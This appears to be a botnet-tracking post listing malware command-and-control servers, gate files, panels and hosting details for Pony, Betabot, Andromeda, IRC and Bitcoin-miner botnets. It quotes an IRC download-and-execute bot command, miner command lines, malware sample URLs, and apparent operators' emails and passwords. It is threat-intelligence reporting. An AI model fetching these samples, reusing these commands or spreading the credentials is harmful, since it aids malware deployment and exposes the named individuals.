Server: 89.163.181.135 Gate file: /.~/ineed/stats.php Config file: /.~/ineed/file.php They forgot to remove the installation directory: hxxp://89.163.181.135/.~/ineed/install/ Found on the same betabot as the recently posted pony loader. Hosting infos: http://whois.domaintools.com/89.163.181.135
93.115.85.58 (Pony loader hosted by voxility.net)
Server: 93.115.85.58 Gate file: /pox/stats.php While investigating a betabot, I found a load of different malware. Here’s a pony loader. It downloads files from hxxp://cy-corp.com/pg/ Hosting infos: http://whois.domaintools.com/93.115.85.58
solutionswiki.com (Andromeda http botnet hosted by alibabahost.com)
Resolved solutionswiki.com to 109.163.233.107 Server: solutionswiki.com Gate file: /pages/image.php There is also a betabot hosted on the same domain. Mining infos: dasHosts.exe -a scrypt-jane -o http://37.221.170.226:8344 -O YFicRwX9HpMkVovPPWG3NAJ9Tpom3YeXqC:x Hosting infos: http://whois.domaintools.com/109.163.233.107
r.gigaionjumbie.biz (Power loader http botnet hosted by digital-forex.net)
Resolved r.gigaionjumbie.biz to 5.199.171.131, 5.199.171.132, 5.199.171.133 Server: r.gigaionjumbie.biz Gate file: /images/gx.php Alternate domains: x.dailyradio.su x.kei.su Hosting infos: http://whois.domaintools.com/5.199.171.131 http://whois.domaintools.com/5.199.171.132 http://whois.domaintools.com/5.199.171.133
ilikeithard.tk(Pony hosted in United States Kansas City Datashack Lc)
Resolved : [ilikeithard.tk] To [63.141.253.125] Panel: hxxp://ilikeithard.tk/Panel/admin.php Sample: directxex.com/uploads/1632963588.Pony.exe found by justaguy hosting infos: http://whois.domaintools.com/63.141.253.125
imgay.ddos.es (betabot http botnet hosted by Fastflux)
Server: imgay.ddos.es Gate file: /h/order.php Alternate domains: imgay.ddos.cat imgay.theswat.net ddos.cat has been linked to botnets before Hosting infos: ;; QUESTION SECTION: ;imgay.ddos.es. IN A ;; ANSWER SECTION: imgay.ddos.es. 149 IN A 94.27.87.58 imgay.ddos.es. 149 IN A 98.195.89.225 imgay.ddos.es. 149 IN A 174.112.126.155 imgay.ddos.es. 149 IN A 176.40.77.176 imgay.ddos.es. 149 IN A 178.150.207.252 imgay.ddos.es. 149 INRead more...
t7v4d.com(irc botnet hosted in United States Phoenix Secured Servers Llc)
Thanks to this guy for the sample Resolved : [t7v4d.com] To [108.170.24.42] Server: t7v4d.com:4040 Now talking in ##tntTopic is ‘!np hxxp://3rbcool.net/g1.exe DF37A37D9E33FB9904235855863AA5D5 -r’ hosting infos: http://whois.domaintools.com/108.170.24.42
privatesmartscreen.nl(Bitcoin Miner hosted in Netherlands Amsterdam Denkers-ict B.v.)
DNS Queries: privatesmartscreen.nl DNS_TYPE_A 159.253.0.151 HTTP Conversations: 159.253.0.151:80 – [privatesmartscreen.nl] Request: GET /Bitcoin/host.txt 149.210.128.55:80 – [149.210.128.55] Request: GET /bitconi/winlogon32.exe Request: GET /bitconi/winlogon64.exe Request: GET /bitconi/usft_ext.dll Request: GET /bitconi/miner.dll Request: GET /bitconi/coinutil.dll Request: GET /ptx.exe Request: GET /bitconi/btc.exe Request: GET /bitconi/phatk.exe Dutch hecker here: winlogon32.exe” -o hxxp://pool.50btc.com:8332/ -u jeroengroenveld@live.nl_Apex -p omega321 Samples:Read more...
pool.50btc.com(Bitcoin Miner botnet hosted in Germany Gunzenhausen Magdevelopers)
Resolved : [pool.50btc.com] To [144.76.52.43] HTTP Requests: hxxp://pool.50btc.com:8332/ DATA: POST / HTTP/1.1Authorization: Basic Y2xhdWRpYWdyem4xQGdtYWlsLmNvbV9jbGF1Og==Content-Length: 128X-Mining-Extensions: hostlist longpoll midstate noncerange rollntime switchtoUser-Agent: Ufasoft coin-miner/0.39 (Windows NT XP 5.1.2600 Service Pack 3) Host: pool.50btc.com:8332Cache-Control: no-cache {“method”: “getblocktemplate”, “params”: [{“capabilities”: [“coinbasetxn”, “workid”, “coinbase/append”, “longpollid”]}], “id”:0} Here the hecker: lsass.exe -gno -t1 -o hxxp://claudiagrzn1%40gmail.com_clau@pool.50btc.com:8332 Sample:hxxp://158.255.2.104/cucaz.exe hosting infos: http://whois.domaintools.com/144.76.52.43
hi.loldump.org(irc botnet hosted in France Roubaix Ovh Systems)
Resolved : [hi.loldump.org] To [176.31.123.56] Server: 176.31.123.56:8782Server Password:Username: __x00Nickname: {iNF-00-DEU-XP-DELL-9523}Channel: #scanner# (Password: )Channeltopic: :.join #scanner2 hosting infos: http://whois.domaintools.com/176.31.123.56